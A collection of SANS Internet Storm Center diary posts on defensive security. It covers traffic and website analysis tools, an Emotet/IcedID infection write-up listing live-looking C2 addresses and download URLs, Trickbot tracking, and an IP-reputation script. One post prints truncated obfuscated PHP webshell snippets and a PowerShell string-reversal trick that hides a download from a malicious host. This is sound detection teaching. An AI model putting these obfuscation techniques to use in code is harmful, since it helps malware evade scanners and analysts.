This post was originally published on this site

I was looking for a tool to easily graph traffic for a project (there are many out there) and while searching I found this tool written as a project by “[…]  Daniel Botterill as part of his MSc Computer Security degree, it has been designed to take in a PCAP capture file and report back any malicious behaviour identified.”[1]

This tool is packed with options (tabs) to analyze traffic in many different ways. There is two sample pcap files included in the MalwareAnalysis folder for testing the tool or you can use your own. I update two lists in BlacklistedAddressesblacklists [3][4] folder before starting the tool for the first time. You can add any list you want which will need to be configured after you start the tool under the Analyzer Settings which I will come back later.

This tool is easy to use and requires Java to be installed in order to work. Download the package from here. It runs on Windows and Linux (I haven’t tested it on Linux) and unzip it. There are 4 scripts available to copy (as admin) the correct windows version of jnetpcap.dll to %windir%system32 or same process for libjnetpcap.so to the correct Linux library. To start the program after the initial installation,  you can execute the  MalWareAnalysis.jar file.

Now it is time to configure the tool before importing any packets. To configure the tool, select Options -> Analyzer Settings:

All the different options are displayed here. For example, I wanted a Network Map to display the traffic relationships and I checked the network map box before moving on to the Blacklisted Addresses tab and added the bt_spyware.txt list to my analyzer as this graph:

Next open and import a pcap file into the PCAP Analyzer:

The pcap I picked contained all the web connections to my honeypot for the last 24 hours. I now go to the Network Map tab and check the traffic relationship between my honeypot (center 192.168.25.5) and the inbound connections to the web server. The graph shows how many attempts per IP and sometimes shows the URL. You can adjust the Network Map Layout (drop down from top) to view the IPs or move the icon around. You can see one of the source to the right requested various PHP scripts 319 times(only first one shown) against the honeypot. The thicker is the line, the more traffic between the hosts.

This one of the many features available. The last feature I am going to used is the Stream Viewer -> TCP Streams. Each packet can be selected to view the ASCII data (if readable)

It is not a replacement for Wireshark but has many of its features where some are easier and quicker to use and can be very useful as another tool to analyze traffic and its payload. There are so many more features I could talk about, you just have to test it for yourself if it should become part of your security set.

[1] http://www.cs.bham.ac.uk/~tpc/PCAP/
[2] http://www.cs.bham.ac.uk/~tpc/PCAP/MalwareAnalysis.zip
[3] https://zeustracker.abuse.ch/blocklist.php?download=domainblocklist
[4] https://www.iblocklist.com/lists

———–
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

While we are enjoying our weekend, it’s always a good time to learn about new pieces of software that could be added to your toolbox. Security analysts have often to quickly investigate a website for malicious content and it’s not always easy to keep a good balance between online or local services. When you submit information to a free online service, they’re good chances that data you submitted are logged and probably analysed/re-used, remember nothing is “for free”. Lookiloo is a tool developed by CIRCL (the Luxembourg CERT) that helps to have a quick overview of a website by scraping it and displaying a tree of domains calling each other. The name “Lookyloo” comes from the Urban Dictionary[1] and means “People who just come to look”.  The tool provides a simple web interface to submit a new site to query or to review previous analysis:

And a few seconds later, you get a tree of domains used by this website. Here is an example of a website used to deliver spam:

For each domain, you get the following information (if detected):

• Presence of Javascript 
• Cookie received
•  Cookie read
• Redirect
• Cookie in URL

Some website (particularly news websites) are nice to analyze. Here is the result of scraping cnn.com:

Lookyloo is available on the CIRCL git repository[2]. I recommend you to use the provided docker-compose.yml file to run your own Docker container.

[1] https://www.urbandictionary.com/define.php?term=lookyloo
[2] https://github.com/CIRCL/lookyloo

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

For attackers, obfuscation is key to keep their malicious code below the radar. Code is obfuscated for two main reasons: defeat automatic detection by AV solutions or tools like YARA (which still rely mainly on signatures) and make the code difficult to read/understand by a security analyst.

Languages like PHP or Powershell are very permissive in the way they handle variables and functions. They also provide plenty of functions that are normally not malicious at all but which can sometimes “ring a bell” when found in pieces of code. A few daya ago, I found a webshell sample that was Base64 encoded (classic behaviour) but instead of calling the function directly, it was stored in a variable. This name being in a variable, it can also be obfuscated. Check out this piece of code:

1: <?php
2: $D=strrev('edoced_46esab’);
3: $s=gzinflate($D('7X39d9s2sujvPaf/A83qBmIi0ZKcdLOSKdtNnE3e5uvGzrZ9tq9KSZTEhiJV...

strrev() is a simple PHP function to revert a string. $D contains “base64_decode” and processes the output of gzinflate(). Simple!

But PHP is not the only language to allow this. Powershell too. There is no native strrev() function in Powershell (as far as a know but I’m not a “guru” in Powershell). So, let’s create our own strrev():

1: function strrev() {
2:   param([string]$s)
3:   $in = $s.ToCharArray()
4:   [array]::Reverse($in)
5:   $out = -join($in)
6:   return $out
7: }

Call the  function with a random name and, now, you can call the obfuscated function to hide suspicious ones:

1: $a = "tseuqeRbeW-ekovnI"
2: $b = lyJF5FnYlGDP($a)
3: $data = &$b "hxxp://www.malicious.site/sample.exe"

So, it could be a good idea to search for interesting/rare function names in your hunting regex or YARA rules. Here are some other examples grabbed (mainly from pastebin.com):

1: <?php
2: $v1 = strrev("edoced_46esab");
3: $v2 = strrev("sserpmocnuzg");
4: eval($v2($v1("eF7VPO1227aS/3NO3gFh1FJqFEuynSaVRPrGlrzx…

Or this one:

1: <?php 
2: $thycsy=chr(99)."r".chr(101).chr(97)."t".chr(101).chr(95)."x66"."u".chr(110).chr(99)."t"."i"."x6f"."n";
3: $szsglt = $thycsy('$a',strrev(';)a$(lave')); 
4: $szsglt(strrev(';))”=oQD9lQCK0QfJkQCK0gCNsjZ1JGJg8GajVWCJkQCK0QfJkQCJoQDJkQ..."(edoced_46esab(lave'));?>

Base64 encoded strings are also present everywhere (think about all email attachments). If you are hunting for interesting strings, search for them in ASCII or encoded with two bytes per character (use the ‘wide’ YARA keyword[1]) but search also for their Base64 encoded version! Some examples:

• “Confidential” : Q29uZmlkZW50aWFs
• “Invoke-Expression”: SW52b2tlLUV4cHJlc3Npb24=
• “ShellExecute”: U2hlbGxFeGVjdXRl
• “eval”: ZXZhbA==

Simple obfuscation technique but it works!

[1] https://yara.readthedocs.io/en/v3.4.0/writingrules.html?highlight=wide

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Introduction

Emotet malware is distributed through malicious spam (malspam), and its active nearly every day–at least every weekday.  Sometimes the criminals behind Emotet take a break, such as a one month-long hiatus from early October through early November, but the infrastructure pushing Emotet has been very active since Monday 2018-11-05.

As Symantec and others have reported, the group behind Emotet has evolved from maintaining its own banking Trojan, and it now also distributes malware for other groups.  I commonly see follow-up malware like Trickbot and Zeus Panda Banker during Emotet infections generated in my lab environment.

Shown above:  Chain of events for recent infections caused by Emotet malspam.

Today’s diary examines an Emotet infection on Wednesday 2018-11-14 with the IcedID banking Tojan as its follow-up malware.

Details

A quick check of URLhaus showed me several URLs tagged emotet and heodo, which is another name for Emotet.  After you’ve seen enough of these URLs, you get a feel for their patterns and can identify an Emotet URL by looking at it.

Shown above:  Several Emotet URLs I saw on URLhaus.

Using a vulnerable Windows host, I picked an Emotet URL to download a Word document.  I opened the document, enabled macros, and saw the expected infection traffic.

Shown above:  Example of a Word document downloaded from an Emotet URL.

Shown above:  Traffic from an infected Windows host filtered in Wireshark.

Forensics on the infected Windows host

After reviewing the infection traffic, I checked my infected Windows host for malware.  Malware binaries for both Emotet and the IcedID banking Trojan were in the same places I’ve seen them before.

Shown above:  Emotet persistent on my infected Windows host.

Shown above:  IcedID persistent on my infected Windows host.

Indicators of Compromise (IoCs)

Malware from my infected Windows host:

SHA256 hash: 045e15c1df7c712dcac94c720b81df08fd0ff4e4c177d231d5cdcd7b4d096f95

• File size: 94,592 bytes
• File name: form-363439590633444.doc (random file names depending on the download URL)
• File description: Downloaded Word doc with macro for Emotet

SHA256 hash: d6dd56e7fb1cc71fc37199b60461e657726c3bf8319ce59177ab4be6ed3b9fb4

• File size: 430,080 bytes
• File location: C:Users[username]AppDataLocalMicrosoftWindows[random name].exe
• File description: Emotet malware binary on the infected Windows host

SHA256 hash: 667cda76b582c0771f85ad12167238e0f4bb12f479030d99c8a15d7f08eb9975

• File size: 421,888 bytes
• File location: C:Users[username]AppDataLocalMicrosoftWindows[random name].exe
• File description: updated Emotet malware binary on the infected Windows host

SHA256 hash: cb04718694115b94b4d8bde2be0a4daf802c7a4c94f9b81811872e4e7126e813

• File size: 424,960 bytes
• File location: C:ProgramDataOFyKiE6aak4yfFf.exe
• File description: IcedID banking Trojan retrieved by Emotet

SHA256 hash: 63e348c05cd94f4488f7f1707ba901ddfa8ec04b4626a46ae2d9d0a83ae291ae

• File size: 424,960 bytes
• File location: C:ProgramData{3B5AAD3D-DD3D-452D-B98C-9F29F9D9C0D3}czvgbwww.exe
• File description: IcedID banking Trojan persistent on the infected Windows host

Traffic from my infected Windows host:

Traffic that returned the initial Word document:

• 78.135.65.15 port 80 – bysound.com.tr – GET /En_us/Documents/11_18/

Traffic that returned the Emotet malware binary:

• 50.62.194.30 port 80 – c-t.com.au – GET /PspAMbuSd2
• 50.62.194.30 port 80 – c-t.com.au – GET /PspAMbuSd2/

Post-infection traffic caused by Emotet:

• 5.9.128.163 port 8080 – Attempted TCP connections, no response from the server
• 12.222.134.10 port 7080 – Attempted TCP connections, no response from the server
• 23.254.203.51 port 8080 – Attempted TCP connections, no response from the server
• 24.201.79.34 port 8080 – 24.201.79.34:8080 – GET /
• 37.120.175.15 port 80 – Attempted TCP connections, no response from the server
• 49.212.135.76 port 443 – 49.212.135.76:443 – GET /
• 50.78.167.65 port 7080 – 50.78.167.65:7080 – GET /
• 69.198.17.20 port 8080 – Attempted TCP connections, no response from the server
• 71.163.171.106 port 80 – 71.163.171.106 – GET /
• 71.58.165.119 port 443 – 71.58.165.119:443 – GET /
• 71.58.165.119 port 443 – 71.58.165.119:443 – GET /whoami.php
• 76.65.158.121 port 50000 – 76.65.158.121:50000 – GET /
• 81.86.197.52 port 8443 – 81.86.197.52:8443 – GET /
• 86.12.247.149 port 80 – Attempted TCP connections, no response from the server
• 109.170.209.165 port 8080 – 109.170.209.165:8080 – GET /
• 133.242.208.183 port 8080 – 133.242.208.183:8080 – GET /
• 138.207.150.46 port 443 – 138.207.150.46:443 – GET /
• 139.59.242.76 port 8080 – Attempted TCP connections, no response from the server
• 159.65.76.245 port 443 – Attempted TCP connections, no response from the server
• 160.36.66.221 port 990 – 160.36.66.221:990 – GET /
• 165.227.213.173 port 8080 – Attempted TCP connections, no response from the server
• 173.11.47.169 port 8080 – 173.11.47.169:8080 – GET /
• 173.19.73.104 port 443 – Attempted TCP connections, no response from the server
• 173.160.205.161 port 990 – 173.160.205.161:990 – GET /
• 173.160.205.162 port 443 – 173.160.205.162:443 – GET /
• 177.242.156.119 port 80 – Attempted TCP connections, no response from the server
• 186.18.236.83 port 8080 – 186.18.236.83:8080 – GET /
• 189.134.18.141 port 443 – Attempted TCP connections, no response from the server
• 189.244.86.184 port 990 – 189.244.86.184:990 – GET /
• 192.155.90.90 port 7080 – Attempted TCP connections, no response from the server
• 198.199.185.25 port 443 – Attempted TCP connections, no response from the server
• 200.127.55.5 port 80 – 200.127.55.5 – GET /
• 205.185.187.190 port 80 – 205.185.187.190 – GET /
• 210.2.86.72 port 8080 – 210.2.86.72:8080 – GET /
• 210.2.86.94 port 8080 – Attempted TCP connections, no response from the server

Post-infection traffic caused by the IcedID banking Trojan:

• 185.129.49.19 port 443 – therebes.biz – SSL/TLS traffic caused by IcedID
• 185.129.49.19 port 80 – freshwallet.at – GET /data2.php?0123456789ABCDEF (different hex characters depending on the infected host)

Final words

Both Emotet and IcedID have remained fairly consistent in their behavioral patterns, so nothing here is unusual.  This diary is yet another reminder the criminals behind Emotet remain active, and they continue to push follow-up malware like the IcedID banking Trojan.

A pcap of the infection traffic and the associated malware from today’s diary can be found here.

—
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

Introduction

Mass-distribution campaigns pushing commonly-seen malware are not often considered newsworthy.  But these campaigns occur on a near-daily basis, and I feel they should be documented as frequently as possible.  Frequent documentation ensures we have publicly-available records that reveal how these campaigns evolve.  Minor changes add up over time.

Today’s diary illustrates a small part of my workday, as I review information and track down a campaign using malicious spam (malspam) to distribute Trickbot malware.

Reporting methods

A growing number of people are using social media tools like Twitter to share information about malware and malicious network activity.  Twitter offers a near-real-time way to push information to a large amount of people.  Security professionals and enthusiasts can easily find, share, and act on this information.

Keep in mind, this sort of public sharing should never include sensitive data.  You should never reveal your organization’s internal network or divulge any classified or confidential documents.  Criminals are likely monitoring public-facing services like VirusTotal and other malware scanning sites, because they “are becoming containers for personal, business and even classified information…“

Some security professionals use private communication methods with a restricted audience, but those methods don’t often apply to the vast majority of people working in information security.  When possible, I prefer to share malware information publicly.

Gathering information

Like many researchers, I use a combination of public and non-public resources when investigating malware.  One great public resource is URLhaus.  URLhaus is a project operated by abuse.ch that helps security researchers, vendors and law enforcement agencies make the Internet a safer place.

On Tuesday 2018-11-13, I was browsing through URLhaus and found two URLs tagged as Trickbot.  I’ve researched a great deal of Trickbot activity, so I knew these URLs could be traced to malspam with an attached Microsoft Office document using macros to download and install Trickbot.

Shown above:  Two URLs tagged as Trickbot according to URLhaus.

I checked my employer’s tools, where I found at least 20 examples of malspam using attached Word documents with macros to generate these URLs.  The malspam was very recent, and no samples of the attached Word documents had yet been submitted to VirusTotal.  I could find information and file hashes from my employer’s tools, but I could not acquire a Word doc to generate any infection traffic.

However, those two URLs from the URLhaus list were still active, so I used one to retrieve a Trickbot binary.  I then used that binary to infect a Windows host in my lab which generated the expected infection traffic.  Post-infection activity revealed the campaign ID as sat101.  These campaign IDs are tagged as <gtag> in configuration files on infected Windows hosts, and they can be used to determine distribution characteristics of the campaign.  For example, Trickbot using campaign IDs starting with “sat” are used in malspam targeting recipients in the United States.

Shown above:  Tuesday’s Trickbot infection traffic filtered in Wireshark.

Quick reporting

With enough information to describe Tuesday’s Trickbot campaign in the US, I wanted to quickly report it.  But compiling a blog post would take at least two hours.  Twitter was my speediest alternative.  I dumped the data to a Pastebin page, created some images, and tweeted the results.

Shown above:  The tweet I sent.

Final words

This diary shows a small part of my workday, and it reveals how I found a recent wave of Trickbot malspam.  As of 20:24 UTC on Tuesday 2018-11-13, none of the associated Word documents were available on VirusTotal.  But a sample of the Trickbot binary had been submitted to hybrid-analysis.com.

—
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This post was originally published on this site

There are a number of IP Reputation services available for public consumption.  A personal favorite was the Packetmail IP Rep service which unexpectedly shut down in September.  Looking for an IP reputation API to replace Packetmail in some of my scripts lead me to Neutrino and their many APIs which can be used to query many facets of an IP.  While their host-reputation API provides an adequate replacement for Packetmail, what got my attention was another Neutrino API, ip-blocklist, which, in my opinion, can be used as a wet finger estimate of potential badness of any IP.  

Once you have signed up for a Neutrino user-id and API Key, you can access the APIs through a web interface or programmatically via the APIs.  The free API account is limited by the number of queries per day, but provides enough capability for the casual user who just wants to check out an IP.  

According to the ip-blocklist API documentation:

“IP blocklist will detect the following categories of IP addresses:

• Malware and spyware
• Criminal netblocks
• Tor nodes
• Proxies and VPNs
• Spiders
• Bots and botnets
• Spammers
• Exploit scanners”

The people at Neutrino do the aggregation of the various blocklists (including DShield) and provide you an easy way of measuring the general badness of an IP.  So the next time you see an IP scanning your webserver you can run it through the Neutrino ip-blocklist API and get an idea of how nasty others think it is.

I threw together a quick python script (included below) to use the Neutrino ip-blocklist API. When the script is run for an IP on Daniel Austin’s Tor Node list the resulting output is:

$python ipblocklist.py 1.172.112.36

Neutrino Blocklist Service

IP:  1.172.112.36
On Blocklist:  True
Number of Blocklists:  1
Last Seen:  2018-11-12 17:27:10
Proxy:  False
Tor:  True
VPN:  False
Malware:  False
Spyware:  False
Dshield:  False
Hijacked:  False
Spider:  False
Bot:  False
SpamBot:  False
ExploitBot:  False
List of Blocklists:
[u’tor’]
 

When run for an IP on the DShield Blocklist the resulting output is:

$python ipblocklist.py 196.52.43.0

Neutrino Blocklist Service

IP:  196.52.43.0
On Blocklist:  True
Number of Blocklists:  1
Last Seen:  2018-11-11 17:25:16
Proxy:  False
Tor:  False
VPN:  False
Malware:  False
Spyware:  False
Dshield:  True
Hijacked:  False
Spider:  False
Bot:  False
SpamBot:  False
ExploitBot:  False
List of Blocklists:
[u’dshield’]
 

Sorry, I was unable to find any nastier IPs to show the results, but I think you can see the potential.

———————- ipblocklist.py script ————————————-

#!/usr/bin/env python
#
import sys, getopt, argparse, requests, json
import urllib, urllib2
import time

def ipblocklist_host(ip):

   NEUTRINO_URL = ‘https://neutrinoapi.com/ip-blocklist’
   NEUTRINO_USERID = ‘<YOUR-NEUTRINO-USERID>’
   NEUTRINO_API_KEY = ‘<YOUR-NEUTRINO-API-KEY>’

   NEUTRINO_PARAMS = {
      ‘user-id’: NEUTRINO_USERID,
      ‘api_key’: NEUTRINO_API_KEY,
      ‘ip’: ip
   }

   req = urllib2.Request(NEUTRINO_URL, urllib.urlencode(NEUTRINO_PARAMS))
   response = urllib2.urlopen(req)
   result = json.loads(response.read())

   print “nnNeutrino Blocklist Servicen”
   print “IP: “, result[‘ip’]
   print “On Blocklist: “, result[‘is-listed’]
   print “Number of Blocklists: “, result[‘list-count’]
   print “Last Seen: “, time.strftime(‘%Y-%m-%d %H:%M:%S’, time.gmtime(result[‘last-seen’]))
   print “Proxy: “, result[‘is-proxy’]
   print “Tor: “, result[‘is-tor’]
   print “VPN: “, result[‘is-vpn’]
   print “Malware: “, result[‘is-malware’]
   print “Spyware: “, result[‘is-spyware’]
   print “Dshield: “, result[‘is-dshield’]
   print “Hijacked: “, result[‘is-hijacked’]
   print “Spider: “, result[‘is-spider’]
   print “Bot: “, result[‘is-bot’]
   print “SpamBot: “, result[‘is-spam-bot’]
   print “ExploitBot: “, result[‘is-exploit-bot’]
   if result[‘list-count’] > 0:
      print “List of Blocklists: n”, result[‘blocklists’]

   return;

def main():

   parser = argparse.ArgumentParser()
   parser.add_argument(‘IP’, help=”IP address”)
   args=parser.parse_args()

   ipblocklist_host(args.IP)

main()   # invoke main
 

P.S. I only use Python for quick and dirty tools for personal use. I am sure this script could be written a whole lot better by someone with actual skill in Python. (-;

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.